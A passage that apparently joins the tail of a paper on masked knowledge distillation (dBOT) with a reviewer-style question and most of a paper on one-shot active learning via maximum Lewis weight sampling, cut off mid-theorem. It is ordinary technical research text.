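    coords = torch.stack([ys.flatten(), xs.flatten()], dim=1).float()  # (L, 2)
    dist = torch.cdist(coords, coords)             # (L, L) pairwise patch distances
    return (attn * dist).sum(dim=-1).mean(dim=-1)  # (H,): mean over queries
```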
While we do not find substantial gains on classification results, the results obtained by distilling from ViT-H are significantly better for dense prediction tasks compared to the default setup, i.e., +0.8 points of AP$_{box}$ and +1.3 points of mIoU with ViT-B as the student. The performance gain in distilling ViT-L from ViT-H is diminished but still valid, i.e., +0.1 AP$_{box}$ and +0.7 mIoU. We also consider MKD with data-richer teachers, e.g., CLIP, as exploratory experiments and set new state-of-the-art results for self-supervised learning. Refer to Appendix C for details.

8 CONCLUSION

As a special case of MIM, we formulate MKD, upon which an empirical investigation is conducted about the influence of different target representations on self-supervised masked autoencoders. The study concludes that it is not necessary to carefully choose the target representation to learn good visual representations if distillation is performed in multiple stages (i.e., with bootstrapped teachers). Instead of initializing teachers with pre-trained models, we resort to random ones for simple practice. Without an extra stage of pre-training, dBOT achieves favorable performance on image classification, object detection, and semantic segmentation. We hope our study and method will provide timely insights for self-supervised learning.

REFERENCES

Jimmy Lei Ba, Jamie Ryan Kiros, and Geoffrey E Hinton. Layer normalization. *arXiv preprint arXiv:1607.06450*, 2016.

Alexei Baevski, Wei-Ning Hsu, Qiantong Xu, Arun Babu, Jiatao Gu, and Michael Auli. Data2vec: A general framework for self-supervised learning in speech, vision and language. In *ICML*, 2022.

Hangbo Bao, Li Dong, and Furu Wei. BEiT: BERT pre-training of image transformers. In *ICLR*, 2022.

Zhaowei Cai and Nuno Vasconcelos. Cascade R-CNN: high quality object detection and instance segmentation. *TPAMI*, 2019.

Mathilde Caron, Ishan Misra, Julien Mairal, Priya Goyal, Piotr Bojanowski, and Armand Joulin. Unsupervised learning of visual features by contrasting cluster assignments. In *NeurIPS*, 2020.

Mathilde Caron, Hugo Touvron, Ishan Misra, Hervé Jégou, Julien Mairal, Piotr Bojanowski, and Armand Joulin. Emerging properties in self-supervised vision transformers. In *ICCV*, 2021.

Ting Chen, Simon Kornblith, Mohammad Norouzi, and Geoffrey Hinton. A simple framework for contrastive learning of visual representations. In *ICML*, 2020.

Navneet Dalal and Bill Triggs. Histograms of oriented gradients for human detection. In *CVPR*, 2005.

Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. ImageNet: A large-scale hierarchical image database. In *CVPR*, 2009.

Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. BERT: Pre-training of deep bidirectional transformers for language understanding. In *NAACL*, 2019.

Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, Jakob Uszkoreit, and Neil Houlsby. An image is worth 16x16 words: Transformers for image recognition at scale. In *ICLR*, 2021.

Ross Girshick. Fast R-CNN. In *ICCV*, 2015.

Xavier Glorot and Yoshua Bengio. Understanding the difficulty of training deep feedforward neural networks. In *ICAIS*, 2010.

Jean-Bastien Grill, Florian Strub, Florent Altché, Corentin Tallec, Pierre H. Richemond, Elena Buchatskaya, Carl Doersch, Bernardo Avila Pires, Zhaohan Daniel Guo, Mohammad Gheshlaghi Azar, Bilal Piot, Koray Kavukcuoglu, Rémi Munos, and Michal Valko.
Bootstrap your own latent: A new approach to self-supervised learning. In *NeurIPS*, 2020. Kaiming He, Haoqi Fan, Yuxin Wu, Saining Xie, and Ross Girshick. Momentum contrast for unsupervised visual representation learning. In *CVPR*, 2020. Kaiming He, Xinlei Chen, Saining Xie, Yanghao Li, Piotr Dollár, and Ross Girshick. Masked autoencoders are scalable vision learners. In *CVPR*, 2022. Geoffrey Hinton, Oriol Vinyals, Jeff Dean, et al. Distilling the knowledge in a neural network. In *NeurIPS Workshops*, 2015. Tsung-Yi Lin, Michael Maire, Serge Belongie, James Hays, Pietro Perona, Deva Ramanan, Piotr Dollár, and C Lawrence Zitnick. Microsoft coco: Common objects in context. In *ECCV*, 2014. Ilya Loshchilov and Frank Hutter. Decoupled weight decay regularization. In *ICLR*, 2019. Wonpyo Park, Dongju Kim, Yan Lu, and Minsu Cho. Relational knowledge distillation. In *CVPR*, 2019.
EDXkkUAIFW
In the empirical setting part, I'm confused about the setting of *50 distinct architectures*. Since it's noted in the footnote that all the experiments were conducted with the same GPU and CPU, I'm wondering whether it's still necessary to employ such a method?
ONE-SHOT ACTIVE LEARNING BASED ON LEWIS WEIGHT SAMPLING FOR MULTIPLE DEEP MODELS Sheng-Jun Huang\textsuperscript{1}, Yi Li\textsuperscript{2}, Yiming Sun\textsuperscript{2} & Ying-Peng Tang\textsuperscript{1,*} College of Computer Science and Technology, Nanjing University of Aeronautics and Astronautics\textsuperscript{1} School of Physical and Mathematical Sciences, Nanyang Technological University\textsuperscript{2} \{huangsj, tangyp\}@nuaa.edu.cn \{yili, yiming005\}@ntu.edu.sg *All authors contributed equally to this work. Ying-Peng Tang is the corresponding author. ABSTRACT Active learning (AL) for multiple target models aims to reduce labeled data querying while effectively training multiple models concurrently. Existing AL algorithms often rely on iterative model training, which can be computationally expensive, particularly for deep models. In this paper, we propose a one-shot AL method to address this challenge, which performs all label queries without repeated model training. Specifically, we extract different representations of the same dataset using distinct network backbones, and actively learn the linear prediction layer on each representation via an $\ell_p$-regression formulation. The regression problems are solved approximately by sampling and reweighting the unlabeled instances based on their maximum Lewis weights across the representations. An upper bound on the number of samples needed is provided with a rigorous analysis for $p \in [1, +\infty)$. Experimental results on 11 benchmarks show that our one-shot approach achieves competitive performances with the state-of-the-art AL methods for multiple target models. 1 INTRODUCTION The rapid advancements in deep learning have led to a substantial increase in demand for extensive labeled data points to effectively train high-performance models. However, data labeling remains costly due to its reliance on human labor. To address this challenge, active learning (AL) (Settles, 2009; Ren et al., 2021) has emerged as an effective strategy for mitigating annotation expenses. This approach estimates the potential utility of different unlabeled instances in improving the performance of a target model and selectively queries the labels of the most beneficial instances from the oracle (i.e., an expert who can provide the ground-truth label). A typical practice of AL conducts label querying and model updating iteratively to exploit the insights from model decisions, i.e., selecting one or a small batch of instances based on the model predictions and updating the target model in each iteration until the labeling budget is exhausted (Cohn et al., 1994; Huang et al., 2014). This paradigm has been widely applied in real-world scenarios (Hoi et al., 2008; Shi & Zhou, 2023). Recently, there has been a significant surge in the demand for the deployment of machine learning systems on diverse resource-constrained devices (Deng et al., 2020; Gou et al., 2021; Menghani, 2023). For example, speech recognition and face recognition systems usually need to support various types of machines with varying computing and memory resources. As a result, the task of training multiple models with varying complexities using the same labeled dataset has arisen (Cai et al., 2019), leading to a new setting of AL where there are multiple target models to be learned simultaneously (Tang & Huang, 2022). Tang & Huang (2022) provide both theoretical and empirical evidence showcasing the potential of AL in alleviating the substantial data labeling burden associated with training multiple target models.
They propose an iterative AL algorithm DIAM and validate its effectiveness for multiple deep models. However, the use of iterative AL methods results in a significant increase in model training cost. This is due to the requirement of training multiple deep models at each query iteration. A potential solution is increasing the querying batch size of conventional batch-mode AL methods. Nevertheless, this may lead to redundant querying (Yang & Loog, 2019). A more cost-effective strategy could be one-shot or single-shot querying, which selects the required number of unlabeled instances and makes all label queries within one iteration, without re-training the models. Most existing one-shot AL methods query a representative set of instances using the distance between feature vectors (Yang & Loog, 2019; Viering et al., 2019; Jin et al., 2022; Shoham & Avron, 2023). However, this approach faces challenges when handling multiple deep models, as the same instance can exhibit different feature representations in different models. This phenomenon arises due to the intrinsic representation learning of deep models, where data representations are implicitly optimized during the training process and varied network architectures yield distinct embeddings. These embeddings may contain abundant information to facilitate data selection. However, such information has not been well exploited by existing one-shot AL methods. Therefore, they may not yield optimal performances in the setting of multiple models. In this paper, we propose a one-shot AL method for multiple deep models, accompanied by a rigorous theoretical analysis. Our method is based on the fact that a deep model can be viewed as a linear prediction layer (i.e., multiple neuron models) and a nonlinear feature extractor (i.e., the network backbone). Therefore, training multiple deep models can be described as learning linear prediction layers from the outputs of distinct network backbones. In this way, active learning from diverse data representations can be formulated as optimizing a shared sampling matrix to minimize the error of each linear predictor. To facilitate computing and analysis, we consider the learning of the prediction layer as an $\ell_p$ regression problem with $p \in (0, +\infty)$. Notably, our empirical studies place particular emphasis on the case of $p = 2$, i.e., the squared loss, which is one of the most commonly used loss functions in deep learning. Specifically, suppose that there are $k$ models and $A^j \in \mathbb{R}^{n \times d}$ ($j = 1, \ldots, k$) is the feature matrix obtained by feeding the dataset into the $j$-th network backbone. Let $f : \mathbb{R} \to \mathbb{R}$ be an $L$-Lipschitz function with $f(0) = 0$. Typical choices of $f$ are activation functions such as ReLU, Sigmoid, and so on. We abuse the notation and apply $f$ to a vector $v \in \mathbb{R}^n$ coordinatewise, i.e., $f(v) = (f(v_1), \ldots, f(v_n))^T$. Suppose that $y^1, \ldots, y^c \in \mathbb{R}^n$ are $c$ label vectors and the task is to minimize the loss $\sum_{i=1}^c \|f(A^j \theta^{ij}) - y^i\|_p^p$ over $\theta^{1j}, \ldots, \theta^{cj} \in \mathbb{R}^d$ for all models $j$ simultaneously. Since the construction of the sampling matrix $S$ (introduced below) is independent of $y^1, \ldots, y^c$, we henceforth assume that $c = 1$, with a single label vector $y \in \mathbb{R}^n$.
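As a concrete (and deliberately simplified) illustration of this formulation, the following numpy sketch fits one linear prediction layer on frozen backbone features by plain gradient descent, assuming the squared loss ($p = 2$) and a ReLU activation; the function name, learning rate, and step count are our own illustrative choices, not the paper's.

```python
import numpy as np

def fit_linear_head(A, y, lr=1e-3, steps=2000):
    # Minimize ||f(A @ theta) - y||_2^2 with f = ReLU, keeping the
    # backbone that produced the feature matrix A frozen.
    n, d = A.shape
    theta = np.zeros(d)
    for _ in range(steps):
        z = A @ theta
        r = np.maximum(z, 0.0) - y                  # f(A theta) - y
        theta -= lr * 2.0 * (A.T @ ((z > 0) * r))   # chain rule through ReLU
    return theta

# One head per backbone: the k feature matrices A^1, ..., A^k share the
# label vector y, so training k models reduces to k independent fits:
# heads = [fit_linear_head(Aj, y) for Aj in feature_mats]
```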
Therefore, we seek a shared reweighted sampling matrix $S$ such that we can, from the labels of the sampled instances $Sy$, approximately solve the regression problem $\min_\theta \|f(A^j \theta) - y\|_p^p$ for all models $j$ simultaneously. The simplest case is when there is a single model, i.e., $k = 1$. In this case, Gajjar et al. (2023a) are the first to study the problem of actively learning a single neuron model. They cast the problem as a least-squares regression problem (i.e., $p = 2$) $\min_\theta \|f(A \theta) - y\|_2^2$ and find a $\tilde{\theta}$ such that $$\|f(A \tilde{\theta}) - y\|_2^2 \leq C \cdot (\|f(A \theta^*) - y\|_2^2 + \epsilon L^2 \|A \theta^*\|_2^2),$$ where $\theta^* = \arg \min_\theta \|f(A \theta) - y\|_2^2$ is the minimizer, $C$ is an absolute constant and $\epsilon$ is an accuracy parameter. Recall that $L$ is the Lipschitz constant of $f$. Gajjar et al. (2023a) also show that the additive term $\epsilon L^2 \|A \theta^*\|_2^2$ is necessary. For $k > 1$ and general $p$, we seek approximate solutions $\tilde{\theta}_1, \ldots, \tilde{\theta}_k$ with the following error guarantee of a similar form on each individual model: $$\|f(A^j \tilde{\theta}_j) - y\|_p^p \leq C \cdot (\|f(A^j \theta^j) - y\|_p^p + \epsilon L^p \|A^j \theta^j\|_p^p),$$ where $\theta^j = \arg \min_\theta \|f(A^j \theta) - y\|_p^p$ is the minimizer for model $j$ and $C = C(p) > 0$ is a constant depending only on $p$. Gajjar et al. (2023a) construct $S$ to be a leverage score sampling matrix and solve $\tilde{\theta} = \arg \min_{\theta \in E} \|f(SA \theta) - Sy\|_2^2$ with $E = \{\theta : \|SA \theta\|_2^2 \leq \|Sy\|_2^2 / (\epsilon L^2)\}$. At the core of their argument lies the classical fact that such an $S$ gives an $\ell_2$ subspace embedding for $A$, i.e., $\|SA \theta\|_2 \approx \|A \theta\|_2$ for all $\theta$ simultaneously. In fact, it is not necessary to sample the rows of $A$ according to the exact leverage scores $\tau_1(A), \ldots, \tau_n(A)$; any sampling probability proportional to $t_i \geq \tau_i(A)$ for the $i$-th row will suffice, with the number of samples being proportional to $\sum_i t_i$. This very fact motivates us to tackle the task of data selection from diverse representations by sampling the rows according to the maximum of leverage scores across the $A^j$'s, i.e., letting $t_i \sim \max_j \tau_i(A^j)$. Solving for each model $j$ by $\tilde{\theta}_j = \arg \min_{\theta \in E^j} \|f(SA^j \theta) - Sy\|_2^2$ with $E^j = \{\theta : \|SA^j \theta\|_2^2 \leq \|Sy\|_2^2 / (\epsilon L^2)\}$ will then achieve (1) for $p = 2$. A potential caveat is that the number of samples needed will be proportional to $\sum_i t_i \sim \sum_i \max_j \tau_i(A^j)$, which could be as large as $kd$. However, empirical studies show that this is not the case for real-world datasets (see Section 3.2), and our approach will thus be efficient. For general \( p \), instead of leverage scores, it is natural to consider Lewis weights, which can be seen as generalizations of leverage scores for general \( p \) (see Section 3.1 for the definition). It is known that an \( \ell_p \) Lewis weight sampling matrix \( S \) gives an \( \ell_p \) subspace embedding, i.e., \( \| SA\theta \|_p \approx \| A\theta \|_p \) for all \( \theta \) simultaneously (Cohen & Peng, 2015).
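To make this sampling scheme concrete for $p = 2$, below is a minimal numpy sketch: `leverage_scores` computes $\tau_i(A) = a_i^\top (A^\top A)^{-1} a_i$ stably via a thin QR factorization, and the sampling probabilities are proportional to the maximum leverage score of each row across the $k$ representations. The helper names are ours, not the paper's.

```python
import numpy as np

def leverage_scores(A):
    # tau_i(A) = a_i^T (A^T A)^{-1} a_i, computed via a thin QR
    # factorization A = QR, for which tau_i = ||q_i||_2^2.
    Q, _ = np.linalg.qr(A)
    return np.sum(Q**2, axis=1)

def max_leverage_probs(feature_mats):
    # feature_mats: list of k matrices A^j, each with n rows.
    # t_i = max_j tau_i(A^j); the sample size scales with sum_i t_i.
    t = np.max([leverage_scores(A) for A in feature_mats], axis=0)
    return t / t.sum()
```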
The approach mentioned above extends to general \( p \) naturally, attaining (1) for general \( p \), by sampling according to the maximum Lewis weights and solving an \( \ell_p \)-regression problem for \( \tilde{\theta}^j \) with an \( \ell_p \)-version of \( E^j \). **Theoretical Results.** For \( k = 1 \), the latest result is to use \( \tilde{O}(d/\epsilon^4) \) queries (Gajjar et al., 2023b), with an analysis specific to \( p = 2 \). We generalize the approach to \( \ell_p \) Lewis weight sampling for \( p \geq 1 \) and extend it to \( k \geq 1 \), giving the following theorem. **Theorem 1.1** (Informal version of Corollary 3.6). Let \( w_1(A^j), \ldots, w_n(A^j) \) denote the Lewis weights of \( A^j \) and \( T = \sum_{i=1}^{n} \max_{j \in [k]} w_i(A^j) \). Suppose that \( T = \text{poly}(d) \). There exists a randomized algorithm which samples \[ m \lesssim \begin{cases} \epsilon^{-4}\, T \log d, & p = 1 \\ \epsilon^{-4}\, T\, d^{\max\{\frac{p}{2}-1,\, 0\}} \log^2 d \log(d/\epsilon), & p > 0 \text{ and } p \neq 1 \end{cases} \] unlabeled instances and outputs solutions \( \hat{\theta}^1, \ldots, \hat{\theta}^k \in \mathbb{R}^d \) such that (1) holds for all \( j \in [k] \) with probability at least 0.9. Note that for a single matrix \( A \in \mathbb{R}^{n \times d} \), the sum \( T = \sum_i w_i(A) = d \) and so Theorem 1.1 implies a sample complexity of \( \tilde{O}(d^{\max\{p/2, 1\}}/\epsilon^4) \), recovering the result in Gajjar et al. (2023b) for \( p = 2 \). **Empirical Findings.** Extensive experiments are conducted on 11 classification and regression benchmarks with 50 distinct deep models. In Section 3.2, we empirically observe that the sum of the maximum leverage scores grows very slowly as the number of models increases. This result reveals the strong correlation among the leverage scores of different deep representations, providing a direction for interpreting deep representation learning (Kornblith et al., 2019; Nguyen et al., 2020). In Section 4, we validate the effectiveness of our method with fine-tuning and vanilla learning scenarios of deep models for both the \( \ell_2 \)-regression loss and cross-entropy loss. The results show that our method outperforms other one-shot baselines. Even when compared with the state-of-the-art iterative AL methods for multiple models, our approach achieves competitive performance. ## 2 RELATED WORK Active learning has been extensively studied in the past decades (Settles, 2009; Ren et al., 2021). With a limited query budget, many methods try to query the labels of the most useful instances for a target model by designing effective selection criteria, which commonly depend on two notions, informativeness and representativeness. Informativeness-based criteria prefer instances where the target model has a highly uncertain prediction (Lewis & Gale, 1994; Yan & Huang, 2018; Kirsch et al., 2019), while representativeness-based criteria prefer instances which can help reduce the distribution gap between the queried instances and the entire dataset (Dasgupta & Hsu, 2008; Chattopadhyay et al., 2012; Sener & Savarese, 2018). While most existing methods focus on improving the performance of a specific target model, Tang & Huang (2022) extend the setting of AL to multiple target models. In this scenario, the active learner seeks to enhance the performance of every target model simultaneously by selective querying.
Their work demonstrates that the query complexity of AL for multiple models can be upper bounded by that of an appropriately designed single model. Based on this insight, they propose an iterative algorithm called DIAM, which queries the labels of the instances located in the joint disagreement regions among multiple models. Although the method is effective, a significant concern is the substantial cost incurred by training multiple deep models at each iteration. To reduce the computational cost of repetitive model training, one-shot AL algorithms have been proposed to query all useful instances in a single batch, thereby avoiding the need for model updates. Yang & Loog (2019) employ existing AL methods with pseudo-labeling to obtain a candidate set of diverse instances, and select the queries based on the feature distance between unlabeled instances and candidate instances. Viering et al. (2019) select representative data points by kernelized discrepancy methods, e.g., Maximum Mean Discrepancy (MMD) (Borgwardt et al., 2006), and give error bounds under different assumptions on data distribution. Jin et al. (2022) propose a one-shot AL method for deep image segmentation. Their approach uses self-supervised learning to obtain more informative representations and selects diverse instances based on clustering results and feature distances. In addition, Coreset (Sener & Savarese, 2018) and Transductive Experimental Design (Yu et al., 2006) are implicit one-shot AL methods. However, all the aforementioned one-shot AL methods cannot handle the distinct representations of multiple deep models. Although most existing AL methods rely on heuristics lacking theoretical analysis, AL with Lewis weight sampling has been well studied for active $\ell_p$-regression problems $\min_{\theta} \|A\theta - y\|_p$, where the matrix $A \in \mathbb{R}^{n \times d}$ is fully accessible while the label vector $y \in \mathbb{R}^n$ needs to be queried (Chen & Price, 2019; Chen & Derezinski, 2021; Parulekar et al., 2021; Chen et al., 2022; Musco et al., 2022). Provable guarantees are obtained for $(1+\epsilon)$-approximate solutions, i.e., $\|A\theta' - y\|_p \leq (1+\epsilon)\|A\theta^* - y\|_p$, where $\theta'$ is the output of the algorithm and $\theta^*$ the true minimizer. For $p = 1$, Parulekar et al. (2021) show that $O(\epsilon^{-2}d \log(d/\epsilon))$ samples suffice. For $p = 2$, Chen & Price (2019) solve the problem optimally with $O(d/\epsilon)$ queries. For $p \in (1, 2)$, Chen & Derezinski (2021) propose the first algorithm to solve the problem with sublinear query complexity, i.e., $O(\epsilon^{-2}d^2 \log d)$. For $p > 2$, Musco et al. (2022) show that $O(\epsilon^{-p}d^{p/2} \log^2 d \log^{p-1}(d/\epsilon))$ queries suffice. Recently, Gajjar et al. (2023a) extend such a sampling method to the single neuron model for $p = 2$, which inspires our work. They establish a multiplicative constant-factor error bound of the form (1) using $O(d^2/\epsilon^4)$ samples. This has been further improved to $O(d/\epsilon^4)$ in Gajjar et al. (2023b). 3 OUR APPROACH 3.1 PRELIMINARIES Notation. Suppose that the dataset has $n$ instances $\alpha_1, \ldots, \alpha_n$ and each $\alpha_i$ has a ground-truth label $y_i$. The given data consist of a small labeled set $L = \{(\alpha_i, y_i)\}_{i=1}^{n_l}$, used for model initialization, and a large unlabeled set $U = \{\alpha_{n_l+1}, \ldots, \alpha_n\}$, used for active querying. Here, $n = n_l + n_u$ and it is assumed that $n_l \ll n_u$.
A neural network can be viewed as the composition of a network backbone and a linear prediction layer $\theta \in \mathbb{R}^d$ composed with an activation function $f(\cdot)$. The prediction of the network is given by $f(A\theta)$, where $A \in \mathbb{R}^{n \times d}$ is the feature matrix obtained by feeding the dataset into the network backbone. Denote by $y \in \mathbb{R}^n$ the corresponding label vector that needs to be queried. In our theoretical analysis, we assume that $d \ll n$, $A$ has full column rank, the network backbone is fixed during the learning of $\theta$, and $f$ is $L$-Lipschitz continuous with $f(0) = 0$. We always assume that $p > 0$. The $\ell_p$ norm of a vector $\theta \in \mathbb{R}^n$ is defined to be $\|\theta\|_p = (\sum_{i=1}^n |\theta_i|^p)^{1/p}$, where $\theta_i$ is the $i$-th coordinate of $\theta$. When $p < 1$, this is not a norm; nevertheless, it remains a well-defined quantity and we shall abuse the notation and denote it by $\|\theta\|_p$. For a matrix $A$, the operator norm of $A$ is defined as $\|A\|_2 = \sup_{\theta \in \mathbb{R}^d \setminus \{0\}} \|A\theta\|_2 / \|\theta\|_2$. For integer $n \geq 1$, we use $[n]$ to denote the set $\{1, 2, \ldots, n\}$. We write $a \sim_\epsilon b$ if $(1-\epsilon)b \leq a \leq (1+\epsilon)b$, and $a \lesssim_{t_1, t_2, \ldots} b$ if there exists a constant $C$ depending only on $t_1, t_2, \ldots$ such that $a \leq Cb$. We also write $a \sim_{t_1, t_2, \ldots} b$ if both $a \lesssim_{t_1, t_2, \ldots} b$ and $b \lesssim_{t_1, t_2, \ldots} a$. Lewis Weights Sampling. We shall define the Lewis weights and state a classical result that Lewis weight sampling gives subspace embeddings, which is the starting point of our algorithm. Definition 3.1 ($\ell_p$ Lewis Weights). Suppose that $A \in \mathbb{R}^{n \times d}$ and its $i$-th row is $a_i \in \mathbb{R}^d$. The $\ell_p$ Lewis weights of $A$ are the weights $w_1, \ldots, w_n$ such that $w_i = \left(a_i^\top (A^\top W^{1-2/p} A)^{-1} a_i\right)^{p/2}$ for all $i \in [n]$, where $W$ is the diagonal matrix with diagonal elements $w_1, w_2, \ldots, w_n$. We remark that Lewis weights satisfy that $w_i(A) \in [0, 1]$ and $\sum_{i=1}^n w_i(A) = d$. When $p = 2$, Lewis weights are exactly the leverage scores. Next, we define $\ell_p$ subspace embedding and sampling matrix. Then, we state the result that Lewis weight sampling gives subspace embeddings. Definition 3.2 ($\ell_p$ Subspace Embedding). Let $\epsilon \in (0, 1)$ be the distortion parameter. A matrix $S \in \mathbb{R}^{m \times n}$ is said to be an $\ell_p$ $\epsilon$-subspace-embedding matrix for $A \in \mathbb{R}^{n \times d}$ if it holds simultaneously for all vectors $\theta \in \mathbb{R}^d$ that $(1-\epsilon)\|A\theta\|_p \leq \|SA\theta\|_p \leq (1+\epsilon)\|A\theta\|_p$. Definition 3.3 (Sampling Matrix). Suppose that $p_1, \ldots, p_n \geq 0$ such that $p_1 + p_2 + \cdots + p_n = 1$ and $e_1, \ldots, e_n$ are the standard basis vectors of $\mathbb{R}^n$. A matrix $S \in \mathbb{R}^{m \times n}$ is called a reweighted sampling matrix if the rows of $S$ are i.i.d. copies of a random vector $X$, where $X = (mp_j)^{-1/p}e_j^T$ with probability $p_j$, $j = 1, \ldots, n$. The number $m$ of rows in $S$ is called the sample size.
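For concreteness, here is a minimal numpy sketch of Definitions 3.1 and 3.3, assuming the standard fixed-point iteration for approximating $\ell_p$ Lewis weights (which converges for $p < 4$; for $p = 2$ it returns the leverage scores after one step) and ignoring numerical safeguards such as QR in place of explicit inverses; the function names are illustrative, and `probs` is assumed to be a normalized numpy array.

```python
import numpy as np

def lewis_weights(A, p=2.0, iters=30):
    # Fixed-point iteration for the l_p Lewis weights:
    # w_i <- (a_i^T (A^T W^{1-2/p} A)^{-1} a_i)^{p/2}.
    n, d = A.shape
    w = np.full(n, d / n)  # positive initialization
    for _ in range(iters):
        G = np.linalg.inv(A.T @ (w[:, None] ** (1.0 - 2.0 / p) * A))
        w = np.einsum('ij,jk,ik->i', A, G, A) ** (p / 2.0)
    return w

def sampling_matrix(probs, m, p=2.0, rng=np.random.default_rng(0)):
    # Reweighted sampling matrix of Definition 3.3: each of the m rows
    # equals (m * p_j)^(-1/p) e_j^T with probability p_j.
    n = len(probs)
    S = np.zeros((m, n))
    rows = rng.choice(n, size=m, p=probs)
    S[np.arange(m), rows] = (m * probs[rows]) ** (-1.0 / p)
    return S
```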
**Lemma 3.4** (Constant-factor Subspace Embedding, (Cohen & Peng, 2015, Theorem 7.1)). Given $A \in \mathbb{R}^{n \times d}$, suppose that $t_i \geq \beta w_i(A)$ for all $i \in [n]$, where $$\beta \gtrsim_p \begin{cases} \log^3 d + \log \frac{1}{\delta}, & 0 < p < 2, p \neq 1 \\ \log d, & p = 1, 2 \\ d^{\frac{p}{2} - 1}(\log d + \log \frac{1}{\delta}), & 2 < p < \infty \end{cases}$$ is a sampling parameter. Let $m = \sum_{i=1}^{n} t_i$. If $S \in \mathbb{R}^{m \times n}$ is a reweighted sampling matrix with sampling probability $p_i = \frac{t_i}{m}$ for all $i$, then $S$ is an $\ell_p$ subspace-embedding matrix for $A$ with probability at least $1 - \delta$. We note that our main theorem only requires the constant-factor subspace embedding property of the sampling matrix $S$ and, therefore, we can ignore the dependence on $\epsilon$ in the bounds for $\ell_p$ subspace embeddings. The case of $p \leq 2$ is proved by Cohen & Peng (2015) and the case of $p > 2$ is originally due to Bourgain et al. (1989). ### 3.2 An Empirical Observation Recall that the sample size of maximum Lewis weight sampling is proportional to $\sum_i \max_j w_i(A^j)$. We would first like to examine this sum across representations, as it will determine the potential query savings. In the following empirical studies, we mainly consider the case of $p = 2$ (i.e., squared loss), where the Lewis weight becomes exactly the leverage score. We conduct experiments on 11 datasets. Due to the space limitation, the empirical settings, dataset specifications and more results are deferred to Appendix D. We report the results on the MNIST, CIFAR-100 and CelebA datasets below in Figure 1. We plot the theoretical upper bound and the exact values of the sum of the maximum leverage score of each instance across different representations. The results show that the exact sum grows very slowly as the number of models increases in both classification and regression tasks. This suggests highly consistent discrimination power of most instances across different representations, as the leverage score measures how hard it is for an instance to be linearly represented by the others. Therefore, our algorithm is cost-effective. Leverage scores also provide a possible direction to interpret the behavior of deep representation learning, as prior works have not discovered any simple form of correlation among the diverse representations obtained by different model architectures (Kornblith et al., 2019; Nguyen et al., 2020). ### 3.3 The Algorithm Based on our empirical observations, we propose to sample and reweight unlabeled instances based on their maximum Lewis weights across multiple representations. Specifically, given the feature matrices of the labeled and unlabeled instances (denoted by $\{L^j\}_{j=1}^{k}$ and $\{U^j\}_{j=1}^{k}$, respectively), our algorithm begins with calculating the Lewis weights of the unlabeled instances based on each of their feature representations. Next, a normalized maximum Lewis weight among multiple representations for each unlabeled instance is obtained: $$p_i = \frac{\max_{j \in [k]} w_i(U^j)}{\sum_{i'=1}^{n_u} \max_{j \in [k]} w_{i'}(U^j)}, \quad i = 1, \ldots, n_u.$$ Figure 1: The trends of the sum of the maximum Lewis weights with $p = 2$ among multiple representations as the number of deep models increases. Panels: (a) MNIST, (b) CIFAR-100, (c) CelebA. Algorithm 1 The Proposed Algorithm. **Input:** Feature matrices of labeled and unlabeled instances $L^j, U^j$ ($j = 1, \ldots, k$), query budget $\tau$. **Output:** Trained linear models $\hat{\theta}^1, \ldots, \hat{\theta}^k$.
**Initialize:** $p, \bar{y} \leftarrow$ zero vectors of length $n_u$; $Q \leftarrow$ an empty list; $m \leftarrow 0$
1: $p_i \leftarrow \max_{1 \leq j \leq k} w_i(U^j)$ for $i = 1, \ldots, n_u$
2: $p_i \leftarrow p_i / \|p\|_1$ for $i = 1, \ldots, n_u$
3: while $Q$ has fewer than $\tau$ distinct elements do
4: $q \leftarrow$ sample a number from $[n_u]$ with replacement with probability $p_1, \ldots, p_{n_u}$
5: $m \leftarrow m + 1$
6: append $q$ to $Q$
7: if the label of the $q$-th unlabeled instance is unknown then
8: $\bar{y}_q \leftarrow$ query the label of the $q$-th unlabeled instance
9: $S \leftarrow$ zero matrix with shape $(n_l + m) \times (n_l + n_u)$
10: $S_{i,i} \leftarrow 1$ for $i = 1, \ldots, n_l$
11: $S_{i+n_l,\,Q_i+n_l} \leftarrow (m \cdot p_{Q_i})^{-1/p}$ for $i = 1, \ldots, m$
12: $\bar{y} \leftarrow [y_1, \ldots, y_{n_l}, \bar{y}]^T$
13: for $j = 1, \ldots, k$ do
14: $A^j \leftarrow \begin{bmatrix} L^j \\ U^j \end{bmatrix}$
15: $\hat{\theta}^j \leftarrow \arg\min_{\theta \in E} \|Sf(A^j \theta) - S\bar{y}\|_p$, where $E = \{\theta : \|SA^j \theta\|_p^p \leq \|S\bar{y}\|_p^p / (\epsilon L^p)\}$
16: return $\hat{\theta}^1, \ldots, \hat{\theta}^k$
In the querying phase, we conduct i.i.d. sampling with replacement on the unlabeled set using a probability distribution $p$. The sampling process is repeated until $\tau$ distinct unlabeled instances are sampled. Let $Q$ denote the set of indices of unlabeled instances that are selected for label query. We reweight each instance with index $q \in Q$ by $(m \cdot p_q)^{-1/p}$. Finally, both the initially labeled instances with weight 1 and the reweighted queried instances will be used to update each of the target models. Note that, although $Q$ may contain repeated entries, each instance will be queried only once and reoccurrences will not incur additional query cost. We present our algorithm in Algorithm 1. ### 3.4 Theoretical Guarantees Our main result is as follows, which can be seen as the guarantee for a single model. **Theorem 3.5.** Let $p > 0$, $f(\cdot)$ be an $L$-Lipschitz function with $f(0) = 0$, $A \in \mathbb{R}^{n \times d}$ be the data matrix and $y \in \mathbb{R}^n$ be the target vector. Consider a reweighted sampling matrix $S$ with row sampling probability $p_i = \frac{t_i}{m}$, where $t_1, \ldots, t_n$ are some quantities and $m = \sum_i t_i$. Suppose that $t_1, \ldots, t_n \in \mathbb{R}$ satisfy that $t_i \geq \beta w_i(A)$, where $$ \beta \gtrsim_p \begin{cases} \epsilon^{-4} \log(\sum_{i=1}^n t_i), & p = 1 \\ \epsilon^{-4} d^{\max\{\frac{p}{2}-1, 0\}} \log^2 d \log(\sum_{i=1}^n t_i), & p > 0 \text{ and } p \neq 1. \end{cases} \quad (2) $$ Then, if $\hat{\theta} = \arg\min_{\theta \in E} \|Sf(A\theta) - Sy\|_p$, where $E = \{\theta : \|SA\theta\|_p^p \leq \|Sy\|_p^p/(\epsilon L^p)\}$, it holds with probability at least 0.9 that $$ \|f(A\hat{\theta}) - y\|_p^p \leq C \left(\|f(A\theta^*) - y\|_p^p + \epsilon 